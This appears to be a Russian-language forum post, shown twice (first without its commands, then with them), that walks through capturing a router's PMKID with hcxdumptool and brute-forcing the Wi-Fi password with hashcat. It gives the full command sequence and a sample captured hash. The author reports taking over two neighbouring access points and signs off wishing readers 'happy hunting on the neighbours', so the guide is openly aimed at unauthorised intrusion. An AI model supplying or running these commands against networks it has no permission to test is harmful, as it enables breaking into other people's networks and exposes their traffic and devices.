Не знаю была ли тут статья такая, возможно она просто под хайдом от меня, все же опишу способ на всякий случай.
Насколько мне известно способ был обнаружен во время тестирования алгоритма wpa3. Не требуется ждать клиента и деаутентифицировать, перехватывать хендшейк и прочее. На каких моделях роутеров данный способ работает точно не могу сказать, но в моем окружении из 4х точек с более менее стабильным сигналом, я захватил две. Больше мне и не надо(основной + запасной каналы).
Подготовка
Устанавливаем на нашу машину(возможно уже у кого то есть часть этих инструментов из коробки):
1. airmon-ng + airodump-ng http://aircrack-ng.org/
2. hcxdumptool https://github.com/ZerBea/hcxdumptool
3. hcxpcaptool https://github.com/ZerBea/hcxtools
4. hashcat https://hashcat.net/hashcat/
По поводу установки расписывать не буду, мануалов полно. Все дальнейшие действия я производил в Debian, поэтому в других дистрах и винде команды могут отличаться, но принцип остается тем же.
Приступим
Картинки взяты с гугла, поэтому сильно не ориентируйтесь по ним.
Первым делом запустим нашу карту в режим монитора.
Имя своего wifi интерфейса можно посмотреть в набрав команду ifconfig(для меня это wlan0).
Далее начинаем захват пакетов с помощью утилиты airodump.
wlna0mon - интерфейс монитора, который появится в списке ifconfig, после старта первой команды.
Видим следующее
Из списка выбираем более или менее устойчивый.
Далее сохраняем его BSSID
Обратите внимание что BSSID мы записываем без ":"
Ну и приступим к основному.
Первым шагом мы должны получить pmkid точки. Делается это так
Что это за ключи и какие значения они могут принимать, вы можете почитать набрав hcxdumptool -h.
В кратце основные --o hash - тут сохранится собственно сам pmkid. --i wlan0mon - интерфейс мониторящей карты. --filterlist - наш сохраненный bssid.
После того как ввели команду увидите примерно следующее
Как только увидим надпись
Можем смело жать CTRL + C и приступать к расшифровке.
Приведем наш pmkid в удобочитаемый вид для hashcat
Если набрать
То получим примерно следующее
Далее заряжаем наш hashcat
Команда для перебора численых паролей из 8 цифр
'?d?d?d?d?d?d?d?d' - это собственно маска. По маскам можете почитать доки hashcat
Комнда для перебора по словарю
Свой hashcat я настроил на брут GPU поэтому по маске из 8 цифр это 10кк паролей, перебирает около часа. По словарям тоже очень быстро работает.
Надеюсь статья была полезной. Хорошей охоты на соседей!
Насколько мне известно способ был обнаружен во время тестирования алгоритма wpa3. Не требуется ждать клиента и деаутентифицировать, перехватывать хендшейк и прочее. На каких моделях роутеров данный способ работает точно не могу сказать, но в моем окружении из 4х точек с более менее стабильным сигналом, я захватил две. Больше мне и не надо(основной + запасной каналы).
Подготовка
Устанавливаем на нашу машину(возможно уже у кого то есть часть этих инструментов из коробки):
1. airmon-ng + airodump-ng http://aircrack-ng.org/
2. hcxdumptool https://github.com/ZerBea/hcxdumptool
3. hcxpcaptool https://github.com/ZerBea/hcxtools
4. hashcat https://hashcat.net/hashcat/
По поводу установки расписывать не буду, мануалов полно. Все дальнейшие действия я производил в Debian, поэтому в других дистрах и винде команды могут отличаться, но принцип остается тем же.
Приступим
Картинки взяты с гугла, поэтому сильно не ориентируйтесь по ним.
Первым делом запустим нашу карту в режим монитора.
Bash:
sudo airmon-ng start wlan0
Далее начинаем захват пакетов с помощью утилиты airodump.
Bash:
sudo airodump-ng wlan0mon
Видим следующее
Из списка выбираем более или менее устойчивый.
Далее сохраняем его BSSID
Bash:
echo "98DED0EF7060" > filter.txt
Ну и приступим к основному.
Первым шагом мы должны получить pmkid точки. Делается это так
Bash:
sudo hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1,2
В кратце основные --o hash - тут сохранится собственно сам pmkid. --i wlan0mon - интерфейс мониторящей карты. --filterlist - наш сохраненный bssid.
После того как ввели команду увидите примерно следующее
Как только увидим надпись
Bash:
[FOUND PMKID]
Приведем наш pmkid в удобочитаемый вид для hashcat
Bash:
sudo hcxpcaptool -z hashtocrack hash
Bash:
cat hashtocrack
Bash:
ef2115548399c67c69639f04feaeebdb:98ded0ef7060:28565aba7224
Команда для перебора численых паролей из 8 цифр
Bash:
sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' --force
Комнда для перебора по словарю
Bash:
sudo hashcat -m 16800 hashtocrack wordlist.txt --force
Надеюсь статья была полезной. Хорошей охоты на соседей!